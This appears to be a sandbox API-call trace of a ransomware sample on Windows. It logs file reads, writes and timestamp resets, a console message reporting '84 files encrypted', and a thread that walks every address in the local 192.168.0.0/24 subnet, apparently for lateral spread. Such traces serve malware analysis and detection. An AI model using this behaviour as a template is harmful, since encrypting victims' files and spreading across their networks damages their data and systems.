[0080.242] GetLastError () returned 0x3e5 [0080.242] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0080.270] ReadFile (in: hFile=0x3b8, lpBuffer=0x206b894, nNumberOfBytesToRead=0xd4, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0080.270] GetLastError () returned 0x3e5 [0080.270] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0080.280] ReadFile (in: hFile=0x3c4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0080.280] GetLastError () returned 0x3e5 [0080.280] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0095.352] ReadFile (in: hFile=0x3d0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0095.358] GetLastError () returned 0x3e5 [0095.358] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0095.360] SetFileTime (hFile=0x3d0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0095.360] CloseHandle (hObject=0x3d0) returned 1 [0095.432] free (_Block=0x3940048) [0095.432] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0095.729] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0095.729] CloseHandle (hObject=0x3c0) returned 1 [0096.072] free (_Block=0x206b860) [0096.072] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.270] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x99e, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0096.270] GetLastError () returned 0x3e5 [0096.270] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.281] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0096.281] CloseHandle (hObject=0x3c0) returned 1 [0096.283] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.289] calloc (_Count=0x40, _Size=0x4) returned 0x53fd38 [0096.290] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0096.290] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd38, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0096.290] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0096.290] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0096.290] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.305] WriteFile (in: hFile=0x3d4, lpBuffer=0x394007c, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 0x0 [0096.305] GetLastError () returned 0x3e5 [0096.305] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.331] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x9fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0096.332] GetLastError () returned 0x3e5 [0096.332] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.344] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0096.345] CloseHandle (hObject=0x3c0) returned 1 [0096.347] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.355] calloc (_Count=0x40, _Size=0x4) returned 0x53fd38 [0096.355] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0096.355] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd38, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0096.355] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0096.355] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0096.356] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.356] WriteFile (in: hFile=0x430, lpBuffer=0x20acf1c*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20acee8 | out: lpBuffer=0x20acf1c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20acee8) returned 1 [0096.357] GetLastError () returned 0x3e5 [0096.357] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.885] ReadFile (in: hFile=0x3c0, lpBuffer=0x394007c, nNumberOfBytesToRead=0xa38, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0096.885] GetLastError () returned 0x3e5 [0096.885] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0096.885] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0096.885] CloseHandle (hObject=0x3c0) returned 1 [0096.887] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0097.002] calloc (_Count=0x40, _Size=0x4) returned 0x53fd90 [0097.002] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0097.002] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd90, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0097.002] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0097.002] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0097.003] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0097.003] WriteFile (in: hFile=0x52c, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0097.004] GetLastError () returned 0x3e5 [0097.004] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0097.645] ReadFile (in: hFile=0x534, lpBuffer=0x394007c, nNumberOfBytesToRead=0xbd0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0097.645] GetLastError () returned 0x3e5 [0097.645] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0097.650] SetFileTime (hFile=0x534, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0097.650] CloseHandle (hObject=0x534) returned 1 [0097.653] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0097.654] ReadFile (in: hFile=0xac4, lpBuffer=0x20acf1c, nNumberOfBytesToRead=0xa62, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8 | out: lpBuffer=0x20acf1c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8) returned 1 [0097.654] GetLastError () returned 0x3e5 [0097.654] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0097.655] SetFileTime (hFile=0xac4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0097.655] CloseHandle (hObject=0xac4) returned 1 [0097.656] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0098.036] calloc (_Count=0x40, _Size=0x4) returned 0x53fd90 [0098.036] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0098.036] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd90, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0098.037] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0098.037] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0098.037] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0098.038] WriteFile (in: hFile=0xcf4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0098.038] GetLastError () returned 0x3e5 [0098.038] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0098.243] ReadFile (in: hFile=0xf20, lpBuffer=0x394007c, nNumberOfBytesToRead=0xa5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0098.243] GetLastError () returned 0x3e5 [0098.243] GetQueuedCompletionStatus (CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff) Thread: id = 15 os_tid = 0xfb0 [0072.122] Sleep (dwMilliseconds=0x7530) [0091.745] GetConsoleWindow () returned 0x50060 [0091.745] IsWindowVisible (hWnd=0x50060) returned 0 [0091.964] wvsprintfA (in: param_1=0x308fa1c, param_2="%ld files encrypted", arglist=0x308ff5c | out: param_1="84 files encrypted") returned 18 [0091.964] wsprintfA (in: param_1=0x308fa1c, param_2="%s\r\n" | out: param_1="84 files encrypted\r\n") returned 20 [0091.964] GetLocalTime (in: lpSystemTime=0x308ff1c | out: lpSystemTime=0x308ff1c*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x1e, wMilliseconds=0x292)) [0091.965] wsprintfA (in: param_1=0x308fe1c, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:50] ") returned 11 [0091.965] GetLastError () returned 0x0 [0091.965] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.965] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0091.966] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x308fe1c*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x308ff48, lpReserved=0x0 | out: lpBuffer=0x308fe1c*, lpNumberOfCharsWritten=0x308ff48*=0xb) returned 1 [0091.967] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0091.967] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x308fa1c*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x308ff48, lpReserved=0x0 | out: lpBuffer=0x308fa1c*, lpNumberOfCharsWritten=0x308ff48*=0x14) returned 1 [0091.967] Sleep (dwMilliseconds=0x7530) Thread: id = 16 os_tid = 0xfb4 [0072.123] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x31cf9f8 | out: lpWSAData=0x31cf9f8) returned 0 [0072.133] malloc (_Size=0x8) returned 0x2064bd0 [0072.133] RtlInitializeSListHead (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) [0072.133] Sleep (dwMilliseconds=0x3a98) [0091.746] malloc (_Size=0x288) returned 0x20ebb50 [0091.746] GetAdaptersInfo (in: AdapterInfo=0x20ebb50, SizePointer=0x31cf9d8 | out: AdapterInfo=0x20ebb50, SizePointer=0x31cf9d8) returned 0x0 [0095.686] GetAdaptersInfo (in: AdapterInfo=0x20ebb50, SizePointer=0x31cf9d8 | out: AdapterInfo=0x20ebb50, SizePointer=0x31cf9d8) returned 0x0 [0095.934] lstrcmpiA (lpString1="192.168.0.236", lpString2="0.0.0.0") returned 1 [0095.934] PathRemoveExtensionA (in: pszPath="192.168.0.236" | out: pszPath="192.168.0") [0095.935] wvsprintfA (in: param_1=0x31cf43c, param_2="Local subnet %s.0/24", arglist=0x31cf97c | out: param_1="Local subnet 192.168.0.0/24") returned 27 [0095.935] wsprintfA (in: param_1=0x31cf43c, param_2="%s\r\n" | out: param_1="Local subnet 192.168.0.0/24\r\n") returned 29 [0095.935] GetLocalTime (in: lpSystemTime=0x31cf93c | out: lpSystemTime=0x31cf93c*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x22, wMilliseconds=0xb7)) [0095.935] wsprintfA (in: param_1=0x31cf83c, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:40] ") returned 11 [0095.935] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0095.935] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0095.935] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x31cf83c*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x31cf968, lpReserved=0x0 | out: lpBuffer=0x31cf83c*, lpNumberOfCharsWritten=0x31cf968*=0xb) returned 1 [0095.936] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0095.936] WriteConsoleA (in: hConsoleOutput=0x7, lpBuffer=0x31cf43c*, nNumberOfCharsToWrite=0x1d, lpNumberOfCharsWritten=0x31cf968, lpReserved=0x0 | out: lpBuffer=0x31cf43c*, lpNumberOfCharsWritten=0x31cf968*=0x1d) returned 1 [0095.937] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.0") returned 11 [0095.937] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.0") returned 1 [0095.937] malloc (_Size=0x1c) returned 0x53d7e8 [0095.937] lstrcpyA (in: lpString1=0x53d7ec, lpString2="192.168.0.0" | out: lpString1="192.168.0.0") returned="192.168.0.0" [0095.937] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x53d7e8 | out: ListHead=0x2064bd0, ListEntry=0x53d7e8) returned 0x0 [0095.937] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.1") returned 11 [0095.937] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.1") returned 1 [0095.937] malloc (_Size=0x1c) returned 0x53d810 [0095.937] lstrcpyA (in: lpString1=0x53d814, lpString2="192.168.0.1" | out: lpString1="192.168.0.1") returned="192.168.0.1" [0095.937] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x53d810 | out: ListHead=0x2064bd0, ListEntry=0x53d810) returned 0x53d7e8 [0095.937] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.2") returned 11 [0095.937] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.2") returned 1 [0095.937] malloc (_Size=0x1c) returned 0x53d838 [0095.937] lstrcpyA (in: lpString1=0x53d83c, lpString2="192.168.0.2" | out: lpString1="192.168.0.2") returned="192.168.0.2" [0095.937] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x53d838 | out: ListHead=0x2064bd0, ListEntry=0x53d838) returned 0x53d810 [0095.937] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.3") returned 11 [0095.937] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.3") returned -1 [0095.937] malloc (_Size=0x1c) returned 0x2060778 [0095.937] lstrcpyA (in: lpString1=0x206077c, lpString2="192.168.0.3" | out: lpString1="192.168.0.3") returned="192.168.0.3" [0095.937] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x2060778 | out: ListHead=0x2064bd0, ListEntry=0x2060778) returned 0x53d838 [0095.937] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.4") returned 11 [0095.937] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.4") returned -1 [0095.937] malloc (_Size=0x1c) returned 0x20607a0 [0095.938] lstrcpyA (in: lpString1=0x20607a4, lpString2="192.168.0.4" | out: lpString1="192.168.0.4") returned="192.168.0.4" [0095.938] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20607a0 | out: ListHead=0x2064bd0, ListEntry=0x20607a0) returned 0x2060778 [0095.938] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.5") returned 11 [0095.938] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.5") returned -1 [0095.938] malloc (_Size=0x1c) returned 0x20607c8 [0095.938] lstrcpyA (in: lpString1=0x20607cc, lpString2="192.168.0.5" | out: lpString1="192.168.0.5") returned="192.168.0.5" [0095.938] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20607c8 | out: ListHead=0x2064bd0, ListEntry=0x20607c8) returned 0x20607a0 [0095.938] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.6") returned 11 [0095.938] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.6") returned -1 [0095.938] malloc (_Size=0x1c) returned 0x20607f0 [0095.938] lstrcpyA (in: lpString1=0x20607f4, lpString2="192.168.0.6" | out: lpString1="192.168.0.6") returned="192.168.0.6" [0095.938] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20607f0 | out: ListHead=0x2064bd0, ListEntry=0x20607f0) returned 0x20607c8 [0095.938] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.7") returned 11 [0095.938] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.7") returned -1 [0095.938] malloc (_Size=0x1c) returned 0x2060818 [0095.938] lstrcpyA (in: lpString1=0x206081c, lpString2="192.168.0.7" | out: lpString1="192.168.0.7") returned="192.168.0.7" [0095.938] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x2060818 | out: ListHead=0x2064bd0, ListEntry=0x2060818) returned 0x20607f0 [0095.938] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.8") returned 11 [0095.938] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.8") returned -1 [0095.938] malloc (_Size=0x1c) returned 0x2060840 [0095.938] lstrcpyA (in: lpString1=0x2060844, lpString2="192.168.0.8" | out: lpString1="192.168.0.8") returned="192.168.0.8" [0095.938] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x2060840 | out: ListHead=0x2064bd0, ListEntry=0x2060840) returned 0x2060818 [0095.938] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.9") returned 11 [0095.938] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.9") returned -1 [0095.938] malloc (_Size=0x1c) returned 0x2060868 [0095.938] lstrcpyA (in: lpString1=0x206086c, lpString2="192.168.0.9" | out: lpString1="192.168.0.9") returned="192.168.0.9" [0095.939] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x2060868 | out: ListHead=0x2064bd0, ListEntry=0x2060868) returned 0x2060840 [0095.939] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.10") returned 12 [0095.939] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.10") returned 1 [0095.939] malloc (_Size=0x1c) returned 0x2060890 [0095.939] lstrcpyA (in: lpString1=0x2060894, lpString2="192.168.0.10" | out: lpString1="192.168.0.10") returned="192.168.0.10" [0095.939] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x2060890 | out: ListHead=0x2064bd0, ListEntry=0x2060890) returned 0x2060868 [0095.939] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.11") returned 12 [0095.939] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.11") returned 1 [0095.939] malloc (_Size=0x1c) returned 0x20608b8 [0095.939] lstrcpyA (in: lpString1=0x20608bc, lpString2="192.168.0.11" | out: lpString1="192.168.0.11") returned="192.168.0.11" [0095.939] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20608b8 | out: ListHead=0x2064bd0, ListEntry=0x20608b8) returned 0x2060890 [0095.939] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.12") returned 12 [0095.939] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.12") returned 1 [0095.939] malloc (_Size=0x1c) returned 0x20608e0 [0095.939] lstrcpyA (in: lpString1=0x20608e4, lpString2="192.168.0.12" | out: lpString1="192.168.0.12") returned="192.168.0.12" [0095.939] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20608e0 | out: ListHead=0x2064bd0, ListEntry=0x20608e0) returned 0x20608b8 [0095.939] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.13") returned 12 [0095.939] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.13") returned 1 [0095.939] malloc (_Size=0x1c) returned 0x2060908 [0095.939] lstrcpyA (in: lpString1=0x206090c, lpString2="192.168.0.13" | out: lpString1="192.168.0.13") returned="192.168.0.13" [0095.939] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x2060908 | out: ListHead=0x2064bd0, ListEntry=0x2060908) returned 0x20608e0 [0095.939] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.14") returned 12 [0095.939] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.14") returned 1 [0095.939] malloc (_Size=0x1c) returned 0x53fcc0 [0095.939] lstrcpyA (in: lpString1=0x53fcc4, lpString2="192.168.0.14" | out: lpString1="192.168.0.14") returned="192.168.0.14" [0095.940] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x53fcc0 | out: ListHead=0x2064bd0, ListEntry=0x53fcc0) returned 0x2060908 [0095.940] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.15") returned 12 [0095.940] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.15") returned 1 [0095.940] malloc (_Size=0x1c) returned 0x53fce8 [0095.940] lstrcpyA (in: lpString1=0x53fcec, lpString2="192.168.0.15" | out: lpString1="192.168.0.15") returned="192.168.0.15" [0095.940] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x53fce8 | out: ListHead=0x2064bd0, ListEntry=0x53fce8) returned 0x53fcc0 